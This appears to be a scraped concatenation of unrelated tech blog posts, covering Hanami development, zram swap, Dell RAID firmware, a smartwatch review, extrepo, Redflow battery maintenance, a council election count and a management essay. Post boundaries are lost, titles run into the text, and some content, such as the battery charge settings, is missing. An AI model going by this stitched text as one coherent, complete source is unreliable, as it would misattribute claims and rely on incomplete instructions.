The next hurdle was getting requirements installed without installing the package itself. It seems that uv is the easiest way to do this. To install the dependencies for the package, but not the package itself, you can do this: uv pip install -r pyproject.toml, this replaces the previous requirements.txt file. To replace test-requirements.txt I also include a [project.optional-dependencies] section, which can be installed with uv pip install -r pyproject.toml --extra test.
I hope this helps someone else figure this out.
Continuations, 2025/36: Tone and tenorQuite a good week of Hanami progress, I think. Partly because I ended up having several nights across the week to get stuff done.
On the code side, I merged a fix that ensures the app inflector is used for all CLI inflections. Also Reviewed Krzysztof’s progress on the db rollback command, which is looking great.
Today (on my #HanamiFriday) I addressed the last remaining Rack v3 compatibility issues in Hanami Controller! This is huge, because it unlocks a Hanami 2.3.0 beta for us. Time to start planning for that!
In the background, Adam continues to bring Dry repos across to our new repo-sync. This week: auto_injector, cli, inflector, configurable, monads, and matcher. Bit by bit, things are getting tidier!
I had the privilege of inducting good friend and amazing human Jojo into our maintainers team this week. Jojo is going to help with our new website, and is already on the way, adding a teams listing and code of conduct text.
Related: I was pleased to upgrade Hanami’s code of conduct to the newly released Contributor Covenant 3.0. Nothing makes me happier than investing in tools that keep our community safe. This stuff matters! OTOH, a few months ago Ruby on Rails quietly downgraded their own version to the weak and under-specified text governing the Ruby language.
I watched the Rails World keynote. Here’s the thing that strikes me, every time: there’s so much anger, incredulity—hate!—laced through every bit of these keynotes. Maybe this gets some people going, but it does the opposite for me. Even more so the narrative of this talk: empire, conquest, expansion, a screaming Kylo Ren.
I’m pretty sure the Pax Romana was not actually great for everyone under it (not to mention the empires that followed).
Anyway, if it were me doing all of this, I would worry about the tone and tenor this sets for the community, and the people it attracts.
And it is me doing this, over here in my corner of the Ruby world. Here’s the thing: every time I’ve taken to a stage, it is only after many hours fretting about making sure I present a positive, inclusive, joyful vision of what we bring to Ruby. For my Baltic Ruby talk (released on YouTube just this week!), I finally dared to offer some gentle criticism of the status quo. To soften it, I chose an obviously outlandish metaphor: the overwhelming gravity behind Ruby orthodoxy as the Death Star, the leader whose values didn’t align with mine as Darth Vader, and our group building Hanami as the Rebel Alliance. After today, I realise it may not so outlandish after all.
And if you want to see me talk, the thoughtbot Open Summit was announced this week, and I’m excited to be taking part! It’s free and online, I hope I can see you there!
Join me at thoughtbot’s Open Summit!I’m delighted to be joining the thoughtbot Open Summit on 31st October this year!
What is Open Summit? From the announcement: “a live, interactive, hands-on day of pairing and solving open source issues in real time. It offers community members the opportunity to contribute, ask questions, and get direct access to project maintainers.�
So, wherever or whenever you are (it’ll be late evening for me!), if you’re interested in our work on Hanami, Dry and Rom, and what it means to be in Ruby open source today, then this free online event is for you! What a cool opportunity. I hope to see you there.
Thank you thoughtbot for putting this on, and for the invitation! 🥰
First Sight is a Dust SciFi short film that’s worthy of Black Mirror [3].
Chengyuan Ma wrote an informative summary of the history of the Great Firewall of China [6]. The V2Ray proxy has a nice feature set!
Interesting article about the JP Morgan Workplace Activity Data Utility (WADU) AI spyware system [7]. Corporate work is going to become even more horrible.
Jalopnik has an interesting article about how Reagan killed the safest car ever built [9].
Wild: From Lost to Found on the Pacific Crest Trail by Cheryl Strayed
A memoir of the author’s 1,100-mile solo hike along the Pacific Crest Trail with flashbacks to her prior life including the recent death of her mother. Recommend 4/5
Future Noir: The Making of Blade Runner by Paul M. Sammon
This 3rd edition from 2017 covers the conception, making and afterlife of the movie. Lots of details, interviews and eye-witness accounts. Recommended for Fans 4/5
My Audiobooks Scoring System
I’ve just started using zram for swap on VMs. The use of compression for swap in Linux apparently isn’t new, it’s been in the Linux kernel since version 3.2 (since 2012). But until recent years I hadn’t used it. When I started using Mobian (the Debian distribution for phones) zram was in the default setup, it basically works and I never needed to bother with it which is exactly what you want from such a technology. After seeing it’s benefits in Mobian I started using it on my laptops where it worked well.
ZRAM means that instead of paging data to storage it is compressed to another part of RAM. That means no access to storage which is a significant benefit if storage is slow (typical for phones) or if storage wearing out is a problem.
For servers you typically have SSDs that are fast and last for significant write volumes, for example the 120G SSDs referenced in my blog post about swap (not) breaking SSD [1] are running well in my parents’ PC because they outlasted all the other hardware connected to them and 120G isn’t usable for anything more demanding than my parents use nowadays. Those are Intel 120G 2.5″ DC grade SATA SSDs. For most servers ZRAM isn’t a good choice as you can just keep doing IO on the SSDs for years.
A server that runs multiple VMs is a special case because you want to isolate the VMs from each other. Support for quotas for storage IO in Linux isn’t easy to configure while limiting the number of CPU cores is very easy. If a system or VM using ZRAM for swap starts paging excessively the bottleneck will be CPU, this probably isn’t going to be great on a phone with a slow CPU but on a server class CPU it will be less of a limit. Whether compression is slower or faster than SSD is a complex issue but it will definitely be just a limit for that VM. When I setup a VM server I want to have some confidence that a DoS attack or configuration error on one VM isn’t going to destroy the performance of other VMs. If the VM server has 4 cores (the smallest VM server I run) and no VM has more than 2 cores then I know that the system can still run adequately if half the CPU performance is being wasted.
Some servers I run have storage limits that make saving the disk space for swap useful. For servers I run in Hetzner (currently only one server but I have run up to 6 at various times in the past) the storage is often limited, Hetzner seems to typically have storage that is 8* the size of RAM so if you have many VMs configured with the swap that they might need in the expectation that usually at most one of them will be actually swapping then it can make a real difference to usable storage. 5% of storage used for swap files isn’t uncommon or unreasonable.
I am still considering the implications of zram on larger systems. If I have a ML server with 512G of RAM would it make sense to use it? It seems plausible that a system might need 550G of RAM and zram could make the difference between jobs being killed with OOM and the jobs just completing. The CPU overhead of compression shouldn’t be an issue as when you have dozens of cores in the system having one or two used for compression is no big deal. If a system is doing strictly ML work there will be a lot of data that can’t be compressed, so the question is how much of the memory is raw input data and the weights used for calculations and how much is arrays with zeros and other things that are easy to compress.
With a big server nothing less than 32G of swap will make much difference to the way things work and if you have 32G of data being actively paged then the fastest NVMe devices probably won’t be enough to give usable performance. As zram uses one “stream” per CPU code if you have 44 cores that means 44 compression streams which should handle greater throughput. I’ll write another blog post if I get a chance to test this.
Just over 2 years ago my Dell T320 server had a motherboard failure [1]. I recently bought another T320 that had been gutted (no drives, PSUs, or RAM) and put the bits from my one in it.
I installed Debian and the resulting installation wouldn’t boot, I tried installing with both UEFI and BIOS modes with the same result. Then I realised that the disks I had installed were available even though I hadn’t gone through the RAID configuration (I usually make a separate RAID-0 for each disk to work best with BTRFS or ZFS). I tried changing the BIOS setting for SATA disks between “RAID” and “AHCI” modes which didn’t change things and realised that the BIOS setting in question probably applies to the SATA connector on the motherboard and that the RAID card was in “IT” mode which means that each disk is seen separately.
If you are using ZFS or BTRFS you don’t want to use a RAID-1, RAID-5, or RAID-6 on the hardware RAID controller, if there are different versions of the data on disks in the stripe then you want the filesystem to be able to work out which one is correct. To use “IT” mode you have to flash a different unsupported firmware on the RAID controller and then you either have to go to some extra effort to make it bootable or have a different device to boot from.
Dell has no reason to support unusual firmware on their RAID controllers. Installing different firmware on a device that is designed for high availability is going to have some probability of data loss and perhaps more importantly for Dell some probability of customers returning hardware during the support period and acting innocent about why it doesn’t work. Dell has a great financial incentive to make it difficult to install Dell firmware on LSI cards from other vendors which have equivalent hardware as they don’t want customers to get all the benefits of iDRAC integration etc without paying the Dell price premium.
All the other vendors have similar financial incentives so there is no official documentation or support on converting between different firmware images. Dell’s support for upgrading the Dell version is pretty good, but it aborts if it sees something different.
I tried following the instructions in this document to flash back to Dell firmware [2]. This document is about the H310 RAID card in my Dell T320 AKA a “LSI SAS 9211-8i”. The sas2flash.efi program didn’t seem to do anything, it returned immediately and didn’t give an error message.
This page gives a start of how to get inside the Dell firmware package but doesn’t work [3]. It didn’t cover the case where sasdupie aborts with an error because it detects the current version as “00.00.00.00” not something that the upgrade program is prepared to upgrade from. But it’s a place to start looking for someone who wants to try harder at this.
Dell tower servers have as a standard feature an internal USB port for a boot device. So I created a boot image on a spare USB stick and installed it there and it then loads the kernel and mounts the filesystem from a SATA hard drive. Once I got that working everything was fine. The Debian/Trixie installer would probably have allowed me to install an EFI device on the internal USB stick as part of the install if I had known what was going to happen.
The system is now fully working and ready to sell. Now I just need to find someone who wants “IT” mode on the RAID controller and hopefully is willing to pay extra for it.
Whatever I sell the system for it seems unlikely to cover the hours I spent working on this. But I learned some interesting things about RAID firmware and hopefully this blog post will be useful to other people, even if only to discourage them from trying to change firmware.
I just bought a Colmi P80 SmartWatch from Aliexpress for $26.11 based on this blog post reviewing it [1]. The main things I was after in this was a larger higher resolution screen because my vision has apparently deteriorated during the time I’ve been wearing a Pinetime [2] and I now can’t read messages on it when not wearing my reading glasses.
The watch hardware is quite OK. It has a larger and higher resolution screen and looks good. The review said that GadgetBridge (the FOSS SmartWatch software in the F-Droid repository) connected when told that the watch was a P79 and in a recent release got support for sending notifications. In my tests with GadgetBridge it doesn’t set the time, can’t seem to send notifications, can’t read the battery level, and seems not to do anything other than just say “connected”. So I installed the proprietary app, as an aside it’s a neat feature to have the watch display a QR code for installing the app, maybe InfiniTime should have a similar QR code for getting GadgetBridge from the F-Droid repository.
The proprietary app is quote OK for the basic functionality and a less technical relative who is using one is happy. For my use the proprietary app is utterly broken. One of my main uses is to get notifications of Jabber messages from the Conversations app (that’s in F-Droid). I have Conversations configured to always have a notification of how many accounts are connected which prevents Android from killing it, with GadgetBridge that notification isn’t reported but the actual message contents are (I don’t know how/why that happens) but with the Colmi app I get repeated notifcation messages on the watch about the accounts being connected. Also the proprietary app has on/off settings for messages to go to the watch for a hard coded list of 16 common apps and an “Others” setting for the rest. GadgetBridge lists the applications that are actually installed so I can configure it not to notify me about Reddit, connecting to my car audio, and many other less common notifications. I prefer the GadgetBridge option to have an allow-list for apps that I want notifications from but it also has a configuration option to use a deny list so you could have everything other than the app that gives lots of low value notifications. The proprietary app has a wide range of watch faces that it can send to the watch which is a nice feature that would be good to have in InfiniTime and GadgetBridge.
The P80 doesn’t display a code on screen when it is paired via Bluetooth so if you have multiple smart watches then you are at risk of connecting to the wrong one and there doesn’t seem to be anything stopping a hostile party from connecting to one. Note that hostile parties are not restricted to the normal maximum transmission power and can use a high gain antenna for reception so they can connect from longer distances than normal Bluetooth devices.
The Colmi P80 hardware is quite decent, the only downside is that the vibration has an annoying “tinny” feel. Strangely it has a rotation sensor for a rotating button (similar to analogue watches) but doesn’t seem to have a use for it as the touch screen does everything.
The watch firmware is quite OK (not great but adequate) but lacking a password for pairing is a significant lack.
The Colmi Android app has some serious issues that make it unusable for what I do and the release version of GadgetBridge doesn’t work with it, so I have gone back to the PineTime for actual use.
The PineTime cost twice as much, has less features (no sensor for O2 level in blood), but seems more solidly constructed.
I plan to continue using the P80 with GadgetBridge and Debian based SmartWatch software to help develop the Debian Mobile project. I expect that at some future time GadgetBridge and the programs written for non-Android Linux distributions will support the P80 and I will transition to it. I am confident that it will work well for me at some future time and that I will get $26.11 of value from it. At this time I recommend that people who do the sort of things I do get one of each and that less technical people get a Colmi P80.
…and its actually a pretty neat idea!
Now admittedly, I encountered extrepo when one of the repos being added to a Docker container build I care about was being unreliable, but that caused me to dig into what it is and how it works and I quite like the idea.
The basic idea is that there are people out there who publish packages for Debian, either as hilarious curl scripts which you’re meant to pipe into a root shell, or as just .deb files which you download and manually install. Instead of being terrible though, what if there was a tool which knew how to provide apt repository configurations for those things? Then, apt would do the right things when the packages changed and so forth. Those configurations could come from a central source which you could also trust to provide the GPG keys that signed those packages. Neat yeah?
So that’s extrepo. First off we need to install it:
sudo apt-get install extrepoYou then discover extrepo repositories mostly with searches, although an empty search will give you everything:
extrepo search | egrep "^Found" | sed -e 's/^Found //' -e 's/:$//'There is a lot in this list. Highlights include things like: brave, mariadb, hashicorp things; kubernetes; proxmox; gitlab; ceph; unfi; and many many more. You can then enable a repo to add it to your local apt configuration:
extrepo enable openstack_epoxyThis creates a file in /etc/apt/sources.d like this:
# cat /etc/apt/sources.list.d/extrepo_openstack_epoxy.sources
Suites: bookworm-epoxy-backports bookworm-epoxy-backports-nochange
Architectures: amd64 arm64
Uris: http://osbpo.debian.net/debian
Types: deb deb-src
Components: main
Signed-By: /var/lib/extrepo/keys/openstack_epoxy.ascNicely, you can also override the URL for the repo, for example if you have a local mirror:
# extrepo enable openstack_epoxy \
--mirror http://mirror-osbpo.home.stillhq.com/debian
Configuration enabled.
root@test:/home/debian# cat /etc/apt/sources.list.d/extrepo_openstack_epoxy.sources
Suites: bookworm-epoxy-backports bookworm-epoxy-backports-nochange
Architectures: amd64 arm64
Uris: http://mirror-osbpo.home.stillhq.com/debian
Types: deb deb-src
Components: main
Signed-By: /var/lib/extrepo/keys/openstack_epoxy.asc
Enabled: yesSo anyway, extrepo is cool. That is all.
Reagan: His Life and Legend by Max Boot
A fairly straightforward single volume biography. Covers everything but not a day-by-day. Especially good with Reagan’s early life. Recommended 4/5
Pillars of Creation: How the James Webb Telescope Unlocked the Secrets of the Cosmos by Richard Panek
Good but a bit shorter than I would have liked. It could have really used another 100 pages on the development of the Telescope and a few stories about researchers. 3/5
My Scoring System
On December 14, 2024 – three weeks after I published the last exciting installment in this series of posts – our new Redflow ZCell battery, which replaced the original one which had developed a leak in the electrode stack, itself failed due to a leak in the electrode stack. With Redflow in liquidation there was obviously no way I was getting a warranty replacement this time around. Happily, Aidan Moore from QuantumNRG put me in touch with Jason Litchfield from GrazAg, who had obtained a number of Redflow’s post-liquidation stock of batteries. With the Christmas holidays coming up, the timing wasn’t great, but we were ultimately able to get the failed unit replaced with a new ZBM3.
At this point the obvious question from anyone who’s been following the Redflow saga is probably going to be: why persevere, especially in light of this article from the ABC which speaks of ongoing reliability issues and disturbingly high failure rates for these batteries. That’s a good question, and like many good questions it has a long and complicated answer.
The technical path of least resistance would have been to migrate to a small rack of Pylontech batteries, as these apparently Just WorkTM with our existing Victron inverter/charger gear. The downside is they’re lithium, so a non-zero fire risk, and our installation is currently in the crawl space under the dining room. If we switched to lithium batteries, we’d need to arrange a separate outdoor steel enclosure of some kind with appropriate venting and fans, probably on the other side of the driveway, and get wiring to and from that. My extremely hand-wavey guess at the time was that it’d easily have cost us at least $20K to do that properly, with maybe half of that being the batteries.
The thing is, I remain convinced that flow batteries are in general a better idea for long-term stationary energy storage than lithium. This article from the Guardian provides a quick high-level summary of what makes flow batteries different. What I really want to be able to do – given Redflow is gone – is migrate to another flow battery, ideally one that actually lives up to the promise of multi-decade longevity. Maybe someone will finally come up with a residential scale vanadium flow battery. Maybe someone will buy Redflow’s IP, carry on their work and fix some of their reliability issues (the latest update from the liquidators at the time of writing says that they have “entered an exclusive negotiation period with a party for the acquisition of Redflow Group’s intellectual property (IP) and certain specific assets”). Maybe we’ll even see a viable open source flow battery – I would love for this to happen, not least because if it failed I’d probably be able to figure out how to fix the damn thing myself!
Leaving our current system in place, and swapping in a new ZBM3 meant we could kick the migration can down the road a ways. It bought us more time to see what other technologies develop, and it cost a lot less in the short term than migrating to lithium would have: $2,750 including GST for a post-demise-of-Redflow 10kWh ZBM3 (although shipping was interesting – more on that later). The real trick going forwards is seeing exactly how far down the road we’ll be able to kick that can. How can we ensure the greatest possible longevity of the new battery?
The ABC article puts it down to manufacturing problems, notably a dependence on repurposed third-party components. While I can see that dependence causing all sorts of extremely irritating manufacturing and design issues, I’m not entirely convinced this is the whole story. I will freely admit that my personal sample is very small, but my two batteries both failing due to electrode stack leaks? If a hose split or a pump had died, or some random doohikey let the magic smoke out, then OK, cool, I get it, those I can see being repurposed third-party components. But these failures were apparently in the electrode stack, and I’m struggling to see how that could be a repurposed third-party component. If nothing else the stack (and the tanks) are surely the pieces that Redflow manufactured themselves. This is their core technology. What could be causing stack leaks? Are they just poorly manufactured, or is there some sort of chemical failure at runtime which physically splits the stack? Or something else? Bear in mind that this is all speculation on my part – I’m neither a chemist nor a battery manufacturer – but I know what I’ve seen, and I know what I’ve heard about leaks in other peoples’ batteries.
On the chemistry front, I found a paper from 2023 entitled Scientific issues of zinc-bromine flow batteries and mitigation strategies. This was authored by a bunch of researchers from the University of Queensland and the former CTO of Redflow, and highlights hydrogen evolution, zinc corrosion and zinc dendrite formation as the fundamental issues with zinc bromine flow batteries. I sincerely hope the authors will forgive me for condensing their fascinating ~9,000 word paper into the following 95 word paragraph:
When the battery is being charged, zinc is plated onto the electrodes. During discharge, the zinc is removed. Dendrites (little tree like structures) can grow due to uneven zinc deposition, or due to hydrogen gas evolution. Left unchecked, dendrites can puncture the separator between the electrodes and lead to short circuits. Additionally, hydrogen gas generated by the battery can raise the electrolyte pH. If the pH is too high, solid zinc can clog a membrane in the stack. If the pH is too low, it can cause zinc corrosion which can make the battery self-discharge.
What if Redflow just never completely solved or mitigated the above issues? Could a dendrite puncture not just the separator, but actually split the stack and result in it leaking? Could clogged membranes combined with hydrogen gas create enough pressure to do the same?
We know that ZBMs have a maintenance cycle which runs at least every 72 hours to first discharge the battery then (theoretically) completely strip the zinc from the electrodes over a subsequent two hour period. We also know that ZBMs have a carbon sock which sits inside the zinc electrolyte tank and helps to keep electrolyte pH in the correct operating range. This needs to be replaced annually.
What if 72 hours is still too long between maintenance cycles? If you search back far enough you’ll find that the maximum maintenance period was originally 96 hours, and I assume that was later revised down to 72 hours after experience in the field. I’ve had subsequent correspondence which says that even more frequent maintenance (24-48 hours) can be better for the batteries. I’ve also encountered a curious intermittent fault with the ZBM3 where occasionally the Strip Pump Run Timer in the battery operates at half speed. If that happens and you don’t notice and reset the battery, the maintenance cycle will actually occur every 144 hours, which is way too long.
In the past I’ve observed frequent high charge current warnings in the Battery Management System (BMS) logs. This is actually normal, as by default the charge voltage is configured to be 57.5V, and there’s a separate high current voltage reduction setting of 1V. The idea is that this will try to make the battery charge as quickly as possible, and if the current gets too high, it will drop the charge voltage dynamically by 1V, which results in current reduction. Is it possible this variable (i.e. potentially uneven) charge current results in uneven zinc deposition?
I’ve also noticed that the battery State of Charge (SoC) calculations get sketchier the longer it’s been between maintenance cycles. If I have maintenance set to 72 hours, then at the end of the maintenance cycle, the battery fairly reliably still reports about 7% SoC. With a 48 hour maintenance period, it reports about 3% SoC at end of maintenance, and with a 24 hour maintenance period, it’s more like 1%. Once maintenance completes the SoC is reset to 0% automatically (because the battery really is empty at that point), but this got me thinking… If the SoC calculation is off, is there any way the battery could inadvertently allow itself to overcharge? Given the numbers above are all obviously overestimates I hope it’s more likely that the battery undercharges, but still, I had to wonder.
Aidan suggested three configuration tweaks which Redflow had told him to try to potentially help optimise battery lifespan:
These are all done via the BMS. The maximum SoC and maintenance time limit are set on the Battery Maintenance screen under Capacity Limiting and Maintenance Timing respectively. I went with 90% SoC as above and 48 hour maintenance. The charge voltage is on the EMS Integration screen. I’ve used the following settings:
In my case, the Normal Charge Voltage was originally 57V, and as I dropped it by 1.5V to get to 55.5V, I dropped the Charge-Blocked and Discharge/Maintenance Cycle voltages by the same amount to arrive at the above figures.
Dropping the maximum SoC means that the battery can’t get completely full and stay there for a long time. This must reduce the total amount of zinc plated on the electrodes, which I hope helps reduce dendrite formation. I also found when reading the paper mentioned earlier that “H2 evolution occurs mostly near the top of charge with mossy or spongy like zinc being plated”, which looks like another good reason to avoid fully charging the battery.
Dropping the charge voltage necessarily reduces the charge current and I assume keeps it much more even than it would be otherwise. I have not seen any high charge current warning since making this change. On the other hand, it does mean the battery charges slower than it would otherwise. I did a little experiment to test this, just watching the figures for amperage and kW the BMS gave me when I tweaked charge voltages:
This means I’m not using the battery as effectively as I could be with a higher charge voltage/current, but if this serves to extend the battery life, I think it’s worth it under the circumstances.
It’s important to keep an eye on is the Strip Pump Run Timer, which went weird on me a couple of times. I really should write a little script to automatically warn me if it starts running at half speed, but I’ve been habitually looking at the BMS briefly almost every day since the system was installed, so I noticed when this problem occurred because the maintenance timing was off. To reset a battery that gets in this state, go to Tools: ZBM Modbus Tool and write the value 0x80 to register 0x2053. This will appear to fail because it immediately resets the unit which thus never reports a successful write, but it does the trick.
Some time in the next six months I’m going to need to beg, borrow, steal or figure out how to manufacture carbon socks. The good news is that this time the replacement procedure is going to be really easy, because unlike the ZBM2 (where you had to mess with some pipe work) and my previous ZBM3 (where there was a cap on the side which in my case would have been completely inaccessible due to proximity to a wall), this one has an easy access screw cap on the front of the electrolyte tank.
The Redflow cloud went offline in late October 2024. This allowed remote access to the BMS, and I understand that some Redflow customers were unaware that it’s possible to access the BMS locally without the cloud. The Redflow cloud allowed firmware updates, and also let Redflow staff monitor batteries and configure them remotely, but it is not actually a hard requirement that this system exist in order for the batteries to continue to operate.
One way to access the BMS locally is via the wifi network on the BMS itself. If this is turned on, and you search for wifi access points you should find one named something like “zcell-bms-XXXX”. The password should be “zcellzcell”. Once you’re connected, open a web browser and go to http://zcell:3000. If that doesn’t work, try http://172.16.29.241:3000. This should let you see the BMS status. If you try to make any configuration changes it will ask you to log in. The default username and password are “admin” and “admin”. These can be changed under Configuration: Users.
The other way of accessing the BMS is to connect to whatever the IP address of the BMS is on your local network. The trick in this case is figuring out what the IP address is. I know what mine is because I logged into my router and looked at its list of attached devices.
Given the Redflow cloud is down and Redflow is out of business, I would actually suggest going into the BMS Site Configuration screen and unchecking the “Enable BMS cloud connection” and “Allow Redflow access to system for service intervention” boxes. There are two reasons for this:
Personally I hope whoever buys the Redflow IP will turn the cloud back on, in which case the above advice will no longer apply.
Individuals such as myself can’t just ring up a random courier and say “Hey, can you please go to New South Wales, pick up a 278kg crate with hazchem stickers that say ‘corrosion’ and have pictures of dead fish, and bring it to me here in Tasmania?” The courier will say “Hell no”, unless you have an account with them. Accordingly I would like to thank Stuart Thomas from Alive Technologies through whom I was able to arrange shipping, because his company does have an account with a courier, and he was also after some batteries so we were able to do a combined shipment. If anyone else is looking to move these batteries around, the courier in this instance was Imagine Cargo. I understand Redflow in the past used Mainfreight and Chemcouriers. In all cases, the courier will need to know the exact dimensions and weight which are in the manual, and will want a safety data sheet. Here they are:
Further thanks to Stuart and Gus (whose flatbed truck almost didn’t make it up our driveway) for last mile delivery, swapping the new ZBM3 into the old enclosure, and getting the damn thing in under our house.
It’s disappointing on many levels that Redflow went under, but like I said earlier, I remain convinced that flow batteries are in general a better idea for long-term stationary energy storage than lithium. I find it interesting that the sale of Redflow’s IP includes “specific assets and shares in Redflow (Thailand) Limited”. Given that’s where the manufacturing was done, could that indicate that the buyer is interested in potentially carrying on further development or manufacturing work? The identity of the buyer remains confidential right now, and final settlement is still a year away, so I guess we’ll just have to wait and see.
Our new ZBM3 was commissioned on March 18, and has been running well ever since. I’ve done everything I know to do to try to ensure it has a long and happy life, and will continue to keep a very close eye on it. There will be followup posts if and when anything else interesting happens.
Some time rather earlier in this journey, I found an easter egg in the BMS, which I didn’t mention in any of my previous posts. I think that might be a nice note to finish on here.
Full/Detailed voting results I am basing this off – You should read this while looking at that
Huge increase in the number of votes: from 144 last year to 2785 this year
The election was to elect Two Council Members from 11 candidates.
The FSU supported Jonathan Ayling and Douglas Brown and gave instructions to their members to vote for them. Other left-wing people circulated voting lists that often included Dylan Reeve and Adam Hunt near the top while discouraging voting for Jonathan Ayling, Douglas Brown and Brynn Neilson.
The initial round saw the FSU’s Jonathan Ayling and Douglas Brown get 1046 votes between them or 38% of those cast and were ranked 1st and 3rd. Since the winning threshold is 929 the FSU was almost certain to win at least one seat at this point. The FSU encouraged their voters to rank Jonathan & Douglas 1st or 2nd by the voter’s birthday. Not all FSU voters followed this and 2/3s ranked Jonathan first which meant he was very likely to be elected.
Dylan Reeve was ranked 2nd while 4th was Bianca Grizhar. It is possible that since candidates were listed in alphabetical order by first name that Bianca benefited. Or possibly Bianca had lots of fans who didn’t post to places I saw.
The bottom 6 candidates ( Seth, Roger, Brynn, Toby, Suzie, Maureen) were eliminated in this round. This is because the total votes for them 118 was less than the next highest candidate Peter-Lucas Jones had (188). So there was no way shuffling votes between them would put them ahead of Peter-Lucas.
Of the 118 votes from defeated candidates 11 couldn’t be distributed in the 2nd round because they didn’t list candidates still in the race ( ie exhausted) . The rest were spread fairly evenly with Bianca picking up most and Douglas and Jonathan less. Indicating people were avoiding the FSU candidates.
Peter-Lucas was in last place 19 votes behind Kaye-Maree so was eliminated.
Peter-Lucas’ 202 votes were transferred quite unevenly. 15 were exhausted but 56% of the rest went to Kaye-Maree. Kaye-Maree was often grouped with Peter-Lucas in a “Maori Ticket” so that would explain the transfers from him to her. Only one of Peter-Lucas’ votes went to a FSU candidate.
Because Kaye-Maree picked up so many votes from Peter-Lucas she now was ahead of Adam.
Adam also picked up relatively few transfers from Kaye-Maree. So Adam was eliminated.
Of Adam’s 320 votes 22 were exhausted. 51% of the rest went to Kaye-Maree while just 9 ( 3%) went to FSU candidates. Dylan also picked up enough votes to put him in 1st place. Remaining candidates were now Dylan, Jonathan, Kaye-Maree, Bianca and Douglas.
Once again Kaye-Maree picked up enough transfers to put her ahead of last place. So this means that in this round the FSU’s Douglas Brown was eliminated. I’ll note that Douglas picked up 350 votes in the first round (when he was 3rd) but since then had received just 13 more votes in transfers and was in 5th place when he was eliminated (both Kaye-Maree and Bianca had passed him with gains of 279 and 133 respectively)
As expected 96% of Douglas’ votes transferred to Jonathan which put him well over the threshold and he was elected.
So Jonathan was the 1st elected Candidate in Round 5
Since Jonathan had 1052 votes he was 123 votes over the 929 winning amount. However 995 out of his 1052 voters did not rank Bianca, Dylan or Kaye-Maree. So only 6.66445 votes were transferred instead of 123.
Of the 57 that did rank one of those three remaining candidates 25 picked Dylan, 20 Kaye-Maree and 12 Bianca. So rankings between those 3 were unchanged.
Bianca was thus in last place 27 votes behind Kaye-Maree so she was eliminated.
This left just two candidates Dylan on 740 and Kaye-Maree 255 votes behind on 485. Since Bianca was on 458 votes he transfers could have elected either candidate but since Dylan was significantly ahead around 75% would have to go to Kaye-Maree for her to win.
In reality just 44% of Bianca votes went to Kaye-Maree, 41% to Dylan and 15% were exhausted. So Dylan ended up 258 votes ahead of Kaye-Maree and just a couple of votes short of being elected that round.
Kaye-Maree was thus eliminated.
Kaye-Maree’s votes were officially transferred to Dylan and Dylan was elected as the 2nd winner.
I spent a lot of last year trying to understand why companies treated the employees they rely on for success so poorly — The Man Who Broke Capitalism; Lights Out; The Idea Factory; AI Snake Oil; Leaders Eat Last; and so on are all part of that journey. At the time I was a bit fixated on Jack Welsh and his long term impact on General Electric — which I would summarize as being overwhelmingly negative. It was a classic example of managing to short term profit metrics, instead of for long term sustainable growth by delighting your customers.
Ultimately this is why I chose to take a break from working for corporate America, as being treated like a replaceable cog in a profit machine wasn’t really working for me.
Then Edward Zitron wrote this blog post which really resonated with me…
When you care only about shareholder value, the only job you have is to promote further exploitation and dominance — not to have happy customers, not to make your company “a good place to work,” not to make a good product, not to make a difference or contribute to anything other than further growth.
While this is, to anyone with a vapor of an intellectual or moral dimension, absolutely f**king stupid, it’s an idea that’s proven depressingly endemic among the managerial elite, in part because it has entered the culture, and because it is hammered across in MBA classes and corporate training seminars.
I had assumed that my general lack of enthusiasm with tech at the moment was due to burnout, but now I wonder if its because there really aren’t any companies out there that are genuinely seeking to improve the lives of their customers, instead of just doing random stuff to juice this quarter’s profit.
We live in a symbolic economy where we apply for jobs, writing CVs and cover letters to resemble a certain kind of hire, with our resume read by someone who doesn’t do or understand our job, but yet is responsible for determining whether we’re worthy of going to the next step of the hiring process. All this so that we might get an interview with a manager or executive who will decide whether they think we can do it. We are managed by people whose job is implicitly not to do work, but oversee it. We are, as children (and young adults), encouraged to aspire to become a manager or executive, to “own our own business,” to “have people that work for us,” and the terms of our society are, by default, that management is not a role you work at, so much as a position you hold — a figurehead that passes the buck and makes far more of them than you do.
I assume that management used to be people who had once done a job, “graduating” to leading a team of people who now did approximately that thing. I say “assume” because its been a long time since I’ve seen much evidence of that in the places I’ve worked at. Now, management is performed by specialists who do not actually understand the mechanics of the work being done, and therefore issue edicts which are decoupled from the reality of the work to be done.
I think this is a key idea — good managers come from the pool of people who have done the type of work they manage, not from the outside having earned some management qualification as a “decider”.
Maybe the point here is around what one should aspire to. Is a life of directing other people to do work a life that you’d consider well lived when you hit the end point? Personally I want to directly and tangibly improve the world around me. There are lots of ways of doing that, but most of them involve actually doing stuff, not just directing other people to do stuff.
I’ve been thinking similar things to Edward already, but I had been using different words. I think honestly Edward’s words are probably better than mine, although I think he’s also being more specific to business problems than I was. I note that I haven’t actually explained my unifying theory of management incompetence here, but that really seems like a topic for another day.
Abundance: What Progress Takes by Ezra Klein, Derek Thompson
A critic of the rules from 50 years ago stopping excesses of development that are now stopping building, science and progress. US-centric but relevant to elsewhere. 4/5
On Locations: Lessons Learned from My Life On Set with The Sopranos and in the Film Industry by Mark Kamine
Lots of stories from the film/TV industry mixed with the author’s career history as a location scout, location manager and unit production manager 4/5
My Audiobook Scoring System
Please note: this post is a re-write of a previous post about my Vevor weather station that failed after a few months because of ineffective weather seals on the outdoor unit. Given the poor warranty service from Vevor, I instead went and bought a weather station from a local retailer. In my case a Jaycar Digitech XC-0434, which also appears to be sold online as a Bressser 6in1 weather station.
Now that we’ve defeated QNAP’s slightly broken udev, we can run a Docker container with rtl_433 in it to wire up our Digitech / Bresser 6in1 weather station to Home Assistant via MQTT. First off, we need a Docker container running rtl_433, which assumes you’ve already setup the udev rule mentioned in the previous post, even if you’re not using a QNAP!
I like to write little shell scripts to run Docker containers. In this case this one:
#!/bin/bash
docker rm -f digitech_weather || true
device=$(readlink -f /dev/rtl433)
docker run --restart always -d \
--name digitech_weather \
--device ${device} \
hertzg/rtl433:master-debian -f 917M -F json \
-Fmqtt://mqttserver,retain=0,events=rtl_433[/model][/id]
What this script does is remove any previous version of the container that might be running. It then uses our reliable symlink from the previous post to lookup the real device file. That real device file is then passed through to the Docker container. I am not entirely sure of the subtleties here, but rtl_433 refused to use the device if I passed it through as the symlink, and Docker doesn’t appear to be able to remap device files like it does for ports or mounts. Regardless, this worked at least.
